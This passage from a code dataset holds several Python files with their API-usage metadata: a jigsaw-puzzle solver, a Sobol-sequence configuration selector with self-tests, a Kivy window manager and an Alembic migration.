ignoreRules\n if not validsides:\n fit = 1e6\n else:\n s1, s2 = pc1.sides[first], pc2.sides[second]\n s1, s2 = s1 - s1[0], np.flipud(s2) - s2[-1]\n offset = math.atan2(s1[-1][1], s1[-1][0]) - math.atan2(s2[-1][1], s2[-1][0])\n s2 = rotate(s2, offset)\n fit = listSim(s1, s2)\n if search:\n stepsize = 1\n steps = 0\n decay = .96\n shifts = np.array([[-1,0], [1,0], [0,-1], [0,1]])\n fits = [listSim(s1-e, s2) for e in shifts]\n shifts = shifts*stepsize\n while fit-.02 > min(fits) and steps < 15:\n fit = listSim(s1, s2)\n shifts = shifts*(decay**steps)\n fits = [listSim(s1-e, s2) for e in shifts]\n steps += 1\n s1 = s1-shifts[np.argmin(fits)]\n #print(f\"improved score by {ofit-fit} after travelling {dist(s1o[0], s1[0])} pixels in {steps} steps\")\n if show:\n if not validsides:\n s1, s2 = s1 - s1[0], s2 - s2[0]\n\n x, y, w, h = cv2.boundingRect(np.append(s1, s2, axis=0).astype(np.float32))\n origin = [-70+x, -70+y]\n s1, s2 = np.array(s1)-origin, np.array(s2)-origin\n im = np.zeros((h+100, w+100, 3), np.uint8)\n im = cv2.putText(im, str(round(fit, 3)), (round(.5*w), 50), cv2.FONT_HERSHEY_DUPLEX, 1, color=(250, 80, 80), lineType=cv2.LINE_AA)\n im = cv2.polylines(im, np.int32([s1]), False, (50, 250, 50), thickness) # green is s1\n im = cv2.polylines(im, np.int32([s2]), False, (50, 0, 250), thickness) # red is s2\n #(round(.75*(h+100)), round(.75*(w+100)))\n return fit, im\n return fit\n\n def validEdgePlacement(self, p, pos, rot):\n x, y = pos\n w, h = self.dims\n if x == 0 and p.sideTypes[(rot+1)%4] != 0:\n return False\n if y == 0 and p.sideTypes[rot] != 0:\n return False\n if y == h-1 and p.sideTypes[(rot+2)%4] != 0:\n return False\n if x == w-1 and p.sideTypes[(rot-1)%4] != 0:\n return False\n if sum(p.sideTypes==0) > 0 and not (x in [0, w-1] or y in [0, h-1]):\n return False\n if sum(p.sideTypes==0) == 2 and pos not in [(0,0), (w-1,0), (w-1,h-1), (0,h-1)]:\n return False\n return True\n \n def showState(self, state=None):\n s = self.state if state==None else state\n for row in s:\n r = bcolors.OKBLUE\n for e in row:\n if e != None:\n idx = self.pcs.index(e)\n r += (\" \"+str(idx)+\" \" if idx < 10 else str(idx)+\" \")\n else:\n r += \" x \"\n print(r + bcolors.ENDC)\n \n def emptyState(self):\n return [[None]*self.dims[0] for i in range(self.dims[1])]\n\n def show(self, scale=1):\n tw = 0\n for pc in self.placed:\n w, h, d = np.shape(pc.cropped)\n tw = w if w > tw else tw\n pzl = np.ones((tw*(self.maxY+1), tw*(self.maxX+1), 3), dtype=np.uint8)*255\n\n rot = np.array([[math.cos(1.571), -math.sin(1.571)], [math.sin(1.571), math.cos(1.571)]])\n for pc in self.placed:\n x, y = pc.pos\n padded = np.ones((tw, tw, 3), dtype=np.uint8)*255\n ch, cw, d = np.shape(pc.cropped)\n if ch != cw:\n new = min(ch, cw)\n crop = cv2.resize(pc.cropped, (new, new), interpolation=cv2.INTER_NEAREST)\n padded[:new,:new] = crop\n else:\n padded[:ch,:cw] = pc.cropped\n\n c1, c2 = pc.croppedCorners[pc.rotation], pc.croppedCorners[(pc.rotation+1)%4]\n dir = (c1-c2)/dist(c1, c2)\n centerpt = [round((c1[0] + c2[0])/2), round((c1[1] + c2[1])/2)]\n perp = np.dot(dir, rot)\n tri = np.int32([[centerpt-55*dir-55*perp], [centerpt+55*dir-55*perp], [centerpt]])\n \n i = pc.rotation\n padded = cv2.fillPoly(padded, [tri], color=(250-70*i, 150-50*i, 80*i), lineType=cv2.LINE_AA)\n pzl[y*tw:(y+1)*tw, x*tw:(x+1)*tw] = padded\n\n return imscale(pzl, scale)", "sub_path": "puzzle/puzl.py", "file_name": "puzl.py", "file_ext": "py", "file_size_in_byte": 14774, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.warnings.filterwarnings", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.warnings", "line_number": 4, "usage_type": "attribute"}, {"api_name": "numpy.VisibleDeprecationWarning", "line_number": 4, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 95, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 97, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 118, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 120, "usage_type": "argument"}, {"api_name": "piece.pc", "line_number": 122, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 123, "usage_type": "argument"}, {"api_name": "numpy.unravel_index", "line_number": 147, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 167, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 168, "usage_type": "argument"}, {"api_name": "piece.pc", "line_number": 169, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 170, "usage_type": "argument"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 240, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 256, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 265, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 266, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_DUPLEX", "line_number": 266, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 266, "usage_type": "attribute"}, {"api_name": "cv2.polylines", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 267, "usage_type": "call"}, {"api_name": "cv2.polylines", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 268, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 307, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 308, "usage_type": "call"}, {"api_name": "piece.pc.cropped", "line_number": 308, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 310, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 312, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 312, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 313, "usage_type": "name"}, {"api_name": "piece.pc.pos", "line_number": 314, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 316, "usage_type": "call"}, {"api_name": "piece.pc.cropped", "line_number": 316, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 316, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 319, "usage_type": "call"}, {"api_name": "piece.pc.cropped", "line_number": 319, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 319, "usage_type": "name"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 319, "usage_type": "attribute"}, {"api_name": "piece.pc.cropped", "line_number": 322, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 322, "usage_type": "name"}, {"api_name": "piece.pc.croppedCorners", "line_number": 324, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 324, "usage_type": "name"}, {"api_name": "piece.pc.rotation", "line_number": 324, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 328, "usage_type": "call"}, {"api_name": "piece.pc.rotation", "line_number": 330, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 330, "usage_type": "name"}, {"api_name": "cv2.fillPoly", "line_number": 331, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 331, "usage_type": "attribute"}]}
+{"seq_id": "233706711", "text": "__doc__ = \"\"\"\n Describes logic of selection algorithm based on Sobol sequences in Sobol space.\"\"\"\n\nimport sobol_seq\nimport logging\n\nfrom selection.selection_algorithm_abs import SelectionAlgorithm\nfrom scipy.spatial.distance import euclidean\nfrom itertools import product\n\n\nclass SobolSequence(SelectionAlgorithm):\n def __init__(self, experiment):\n \"\"\"\n Creates SobolSequence instance that stores information about number of generated points\n :param experiment: the instance of Experiment class\n \"\"\"\n\n self.search_space = experiment.description[\"DomainDescription\"][\"AllConfigurations\"]\n self.dimensionality = len(self.search_space)\n self.numOfGeneratedPoints = 0 # Counter of retrieved points from Sobol sequence.\n self.returned_points = [] # Storing previously returned points.\n self.hypercube_coordinates = []\n self.logger = logging.getLogger(__name__)\n\n # Need to use floating numbers of indexes for searching distances between target point\n # and other points in hypercube\n for dimension in self.search_space:\n dim_indexes = [float(x) for x in range(len(dimension))]\n self.hypercube_coordinates.append(dim_indexes)\n\n # Building hypercube\n self.hypercube = list(product(*self.hypercube_coordinates))\n\n def __generate_sobol_vector(self):\n \"\"\"\n Generates a next sobol vector in the current search space.\n :return: sobol vector as numpy array.\n \"\"\"\n\n # https://github.com/naught101/sobol_seq#usage\n vector, _ = sobol_seq.i4_sobol(self.dimensionality, self.numOfGeneratedPoints + 1)\n self.numOfGeneratedPoints += 1\n\n return vector\n\n def __impose_point_to_search_space(self, point):\n \"\"\"\n Generates sobol sequence of uniformly distributed data points in N dimensional space.\n :param number_of_data_points: int - number of points that needed to be generated in this iteration\n :param skip: int - number of points to skip from the beginning of sequence,\n because sobol_seq.i4_sobol_generate stateless.\n :return: sobol sequence as numpy array.\n Takes point with coordinates of exact configuration from search space and retrieves real configuration.\n :param point: list.\n :return: list. Configuration from search space.\n \"\"\"\n\n imposed_point = []\n\n for dimension_index, dimension_value in enumerate(point):\n imposed_point.append(self.search_space[int(dimension_index)][int(dimension_value)])\n\n return imposed_point\n\n def get_next_configuration(self):\n \"\"\"\n Will return next data point from initiated Sobol sequence imposed to the search space.\n :return: list - point in current search space.\n \"\"\"\n # Getting next point from sobol sequence.\n point = self.__generate_sobol_vector()\n\n # Imposed this point to hypercube dimension sizes.\n point = [len(self.hypercube_coordinates[dimension_index]) * dimension_value for dimension_index, dimension_value\n in enumerate(point)]\n\n # Calculate dictionary (keys - distance, values - point) with distances to self.numOfGeneratedPoints\n # nearest points in search space from this point.\n #\n # self.numOfGeneratedPoints + 1(and current point), because in the worst case we will\n # skip(because they was previously returned) this number of points\n\n distances_dict = {}\n for hypercube_point in self.hypercube:\n if len(distances_dict) < self.numOfGeneratedPoints + 1:\n distances_dict[euclidean(point, hypercube_point)] = hypercube_point\n elif len(distances_dict) == self.numOfGeneratedPoints + 1:\n distances = list(distances_dict.keys())\n distances.sort()\n del(distances_dict[distances.pop()])\n distances_dict[euclidean(point, hypercube_point)] = hypercube_point\n\n # Picking existing configuration point from hypercube by the smallest distance to generated by Sobol point,\n # if it was not previously picked.\n unique_point = None\n distances = list(distances_dict.keys())\n distances.sort()\n for current_distance in distances:\n candidate = self.__impose_point_to_search_space(distances_dict[current_distance])\n if candidate not in self.returned_points:\n unique_point = candidate\n self.returned_points.append(candidate)\n break\n if not unique_point:\n # In this point Sobol unable to generate unique configuration as all\n # configurations have been returned at least once.\n unique_point = self.__impose_point_to_search_space(point)\n self.logger.warn(\"Retrieving not unique configuration point from the Sobol selection algorithm!\")\n self.logger.debug(\"Retrieving new configuration from the Sobol sequence: %s\" % str(unique_point))\n return unique_point\n\n def __disable_point(self, point):\n \"\"\"\n This method should be used to let Sobol sequence know,\n that some points of search space have been already picked by prediction model.\n :param point: list. Point from search space.\n :return: None\n \"\"\"\n if point not in self.returned_points:\n self.returned_points.append(point)\n return True\n else:\n self.logger.warn(\"WARNING! Trying to disable point that have been already retrieved(or disabled).\")\n return False\n\n def disable_configurations(self, configurations):\n \"\"\"\n This method should be used to forbid points of the Search Space that \n have been already picked as a Model prediction.\n :param configurations: list of configurations. Configurations from search space.\n :return: None\n \"\"\"\n for p in configurations:\n self.__disable_point(p.get_parameters())\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Add these lines to the beginning of the script to be able to run it stand-alone. (fixes imports):\n\nfrom os import chdir\nfrom os.path import abspath\nfrom sys import path\nchdir('..')\npath.append(abspath('.'))\n \"\"\"\n from time import time\n from random import choice\n\n\n def test_for_duplicates(generated_configs):\n # helper function\n for config in generated_configs:\n if generated_configs.count(config) > 1:\n print(\"Repeated(%s times) configuration(%s) found!\" % (generated_configs.count(config), config))\n return True\n return False\n\n\n test_space = [[x for x in range(8)],\n [x / 10 for x in range(8)],\n [x * 10 for x in range(8)]] # 3D search space with 512 points in it.\n\n print(\"Testing the basic functionality for retrieving an unique points.\")\n started = time()\n sobol = SobolSequence(None, test_space)\n generated_configs = [sobol.get_next_configuration() for _ in range(len(list(product(*test_space))))]\n assert test_for_duplicates(generated_configs) is False, 'Got duplicates in normal search space.'\n print(\"Time to generate all(%s) points in these search space: %s \" % (len(generated_configs), time() - started))\n\n print(\"Testing basic functionality for retrieving more points that the search space contains. Duplicates appears.\")\n sobol = SobolSequence(None, test_space)\n generated_configs = [sobol.get_next_configuration() for _ in range(len(list(product(*test_space))) + 1)]\n assert test_for_duplicates(generated_configs) is True, 'Unique configs with exceeding search space, investigate.'\n\n print(\"Testing disabling the same point multiple times and further proper work of the Sobol.\")\n sobol = SobolSequence(None, test_space)\n configuration = choice(list(product(*test_space)))\n assert sobol.__disable_point(configuration) is True, \"Unable to disable configuration!\"\n assert sobol.__disable_point(configuration) is False, \"Able to disable same configuration twice!\"\n generated_configs = [sobol.get_next_configuration() for _ in range(len(list(product(*test_space))) - 1)]\n assert test_for_duplicates(generated_configs) is False, \"Got duplicates in search space with disabled configurations.\"\n\n print(\"Testing the multiple points disabling and further proper work of the Sobol.\")\n sobol = SobolSequence(None, test_space)\n for point in list(product(*test_space))[0: int(len(list(product(*test_space)))/3)]:\n sobol.__disable_point(point)\n generated_configs = [sobol.get_next_configuration() for _ in range(int(len(list(product(*test_space)))/3))]\n assert test_for_duplicates(generated_configs) is False, \\\n \"Got duplicates with multiple (%s) disabled points!\" % len(sobol.returned_points)\n\n print(\"\\nUnit test pass.\")\n", "sub_path": "main-node/selection/sobol.py", "file_name": "sobol.py", "file_ext": "py", "file_size_in_byte": 8964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "selection.selection_algorithm_abs.SelectionAlgorithm", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 33, "usage_type": "call"}, {"api_name": "sobol_seq.i4_sobol", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 87, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time", "line_number": 166, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 170, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 174, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 179, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 179, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 182, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 187, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 189, "usage_type": "call"}]}
+{"seq_id": "498805895", "text": "from kivy.properties import ObjectProperty\nfrom kivy.uix.screenmanager import NoTransition, ScreenManager\n\nfrom widgets import utils\nfrom widgets.homepage.HomePage import HomeScreen\nfrom widgets.Window import Window\nfrom widgets.navdrawer.helpmenu.HelpPage import HelpPage\n\n\nclass WindowManager(ScreenManager):\n nav_drawer = ObjectProperty()\n\n def __init__(self, **kwargs):\n super(WindowManager, self).__init__(**kwargs)\n # adding all the pages found in the pages json file and creating a new project if none are found\n\n utils.window_manager = self\n if len(utils.keys) == 1:\n self.add_widget(Window(utils.keys[0], utils.keys[0], utils.keys[0], utils.data[utils.keys[0]]))\n else:\n for window in utils.keys:\n if window == utils.keys[0] and utils.keys[utils.keys.index(window) + 1] is not None:\n self.add_widget(Window(window, window, utils.keys[utils.keys.index(window) + 1], utils.data[window]))\n elif window == utils.keys[-1] and utils.keys[utils.keys.index(window) - 1] is not None:\n self.add_widget(Window(window, utils.keys[utils.keys.index(window) - 1], window, utils.data[window]))\n else:\n self.add_widget(\n Window(window, utils.keys[utils.keys.index(window) - 1],\n utils.keys[utils.keys.index(window) + 1],\n utils.data[window]))\n self.home_screen = HomeScreen(self, \"home_select\")\n self.add_widget(self.home_screen)\n self.transition = NoTransition()\n self.current = \"home_select\"\n\n self.help_screen = HelpPage(\"help_page\")\n self.add_widget(self.help_screen)\n\n def add_null_window(self, window_data_key):\n # if len(utils.keys) == 1:\n new_win = Window(window_data_key, window_data_key, window_data_key, utils.data[window_data_key], False)\n # else:\n # new_win = Window(window_data_key, utils.windows[-2], window_data_key[-1], utils.data[window_data_key], False)\n self.add_widget(new_win)\n self.home_screen.home_select_page.add_card(window_data_key)\n utils.update_changes()\n", "sub_path": "widgets/WindowManager.py", "file_name": "WindowManager.py", "file_ext": "py", "file_size_in_byte": 2222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "kivy.uix.screenmanager.ScreenManager", "line_number": 10, "usage_type": "name"}, {"api_name": "kivy.properties.ObjectProperty", "line_number": 11, "usage_type": "call"}, {"api_name": "widgets.utils.window_manager", "line_number": 17, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 17, "usage_type": "name"}, {"api_name": "widgets.utils.keys", "line_number": 18, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 18, "usage_type": "name"}, {"api_name": "widgets.Window.Window", "line_number": 19, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 19, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 19, "usage_type": "name"}, {"api_name": "widgets.utils.data", "line_number": 19, "usage_type": "attribute"}, {"api_name": "widgets.utils.keys", "line_number": 21, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 21, "usage_type": "name"}, {"api_name": "widgets.utils.keys", "line_number": 22, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 22, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 22, "usage_type": "call"}, {"api_name": "widgets.Window.Window", "line_number": 23, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 23, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 23, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 23, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 23, "usage_type": "attribute"}, {"api_name": "widgets.utils.keys", "line_number": 24, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 24, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 24, "usage_type": "call"}, {"api_name": "widgets.Window.Window", "line_number": 25, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 25, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 25, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 25, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 25, "usage_type": "attribute"}, {"api_name": "widgets.Window.Window", "line_number": 28, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 28, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 28, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 28, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 29, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 29, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 29, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 30, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 30, "usage_type": "name"}, {"api_name": "widgets.homepage.HomePage.HomeScreen", "line_number": 31, "usage_type": "call"}, {"api_name": "kivy.uix.screenmanager.NoTransition", "line_number": 33, "usage_type": "call"}, {"api_name": "widgets.navdrawer.helpmenu.HelpPage.HelpPage", "line_number": 36, "usage_type": "call"}, {"api_name": "widgets.Window.Window", "line_number": 41, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 41, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 41, "usage_type": "name"}, {"api_name": "widgets.utils.update_changes", "line_number": 46, "usage_type": "call"}, {"api_name": "widgets.utils", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "356879402", "text": "\"\"\"empty message\n\nRevision ID: b461795a6389\nRevises: \nCreate Date: 2021-09-07 17:18:57.405513\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'b461795a6389'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('channels',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('channelName', sa.String(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.Column('updatedTime', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('channelName')\n )\n op.create_index(op.f('ix_channels_id'), 'channels', ['id'], unique=False)\n op.create_table('mobiles',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('number', sa.String(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.Column('updatedTime', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('number')\n )\n op.create_index(op.f('ix_mobiles_id'), 'mobiles', ['id'], unique=False)\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(), nullable=True),\n sa.Column('last_name', sa.String(), nullable=True),\n sa.Column('age', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_id'), 'users', ['id'], unique=False)\n op.create_table('groups',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('mobile_id', sa.Integer(), nullable=True),\n sa.Column('Channel_id', sa.Integer(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['Channel_id'], ['channels.id'], ),\n sa.ForeignKeyConstraint(['mobile_id'], ['mobiles.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('messageID', postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column('message', sa.String(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.Column('updatedTime', sa.DateTime(), nullable=True),\n sa.Column('channel_id', sa.Integer(), nullable=True),\n sa.Column('mobile_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['channel_id'], ['channels.id'], ),\n sa.ForeignKeyConstraint(['mobile_id'], ['mobiles.id'], ),\n sa.PrimaryKeyConstraint('messageID')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('messages')\n op.drop_table('groups')\n op.drop_index(op.f('ix_users_id'), table_name='users')\n op.drop_table('users')\n op.drop_index(op.f('ix_mobiles_id'), table_name='mobiles')\n op.drop_table('mobiles')\n op.drop_index(op.f('ix_channels_id'), table_name='channels')\n op.drop_table('channels')\n # ### end Alembic commands ###\n", "sub_path": "alembic/versions/b461795a6389_.py", "file_name": "b461795a6389_.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.UniqueConstraint", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.UniqueConstraint", "line_number": 36, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 38, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 38, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 38, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 44, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 47, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 47, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 51, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 54, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 56, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 56, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 58, "usage_type": "call"}, {"api_name": 